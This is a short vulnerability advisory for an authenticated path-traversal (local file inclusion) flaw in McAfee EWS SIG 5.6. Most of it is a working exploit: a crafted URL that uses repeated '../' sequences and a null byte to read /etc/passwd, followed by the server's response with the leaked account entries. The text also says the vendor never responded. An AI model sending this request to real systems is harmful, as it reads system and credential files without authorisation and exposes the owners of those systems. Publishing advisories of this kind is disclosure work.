McAfee EWS SIG 5.6 1741.115 Arbitrary File Read - Low Privs - Authenticated

Vulnerability Title: McAfee EWS SIG 5.6 1741.115 Arbitrary File Read - Low Privs - Authenticated

Vulnerable System:

  • McAfee EWS SIG 5.6 1741.115

Description:

The application is vulnerable to a local file inclusion vulnerability.

Exploit:

Request:

/scmadmin/29836/cgi-bin/handle_download/report_download/Overview.pdf?report=../../../../../../../../../../../../../../../../etc/passwd%00overview&type=PDF

Response:

HTTP/1.1 200 OK
Date: Fri, 14 Dec 2012 00:58:50 GMT
Server: Apache/2.0.63 (Unix)
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/pdf;
Content-Length: 763

# Copyright (C) 2007 McAfee Inc. All rights reserved.
root:x:0:0:root:/root:/bin/bash
daemon:x:2:2:daemon:/sbin:
lp:x:4:7:lp:/var/spool/lpd:
sync:x:5:0:sync:/sbin:/bin/sync
mail:x:8:12:mail:/var/spool/mail:
uucp:x:10:14:uucp:/:
….

Impact: Impact is low, due to the fact that they need valid credentials to be exploited.

Recommendation:

No response from MCAfee to the submission.

© 2015 coma. All rights reserved.
Disclaimer: There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk.
In no event shall the author be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.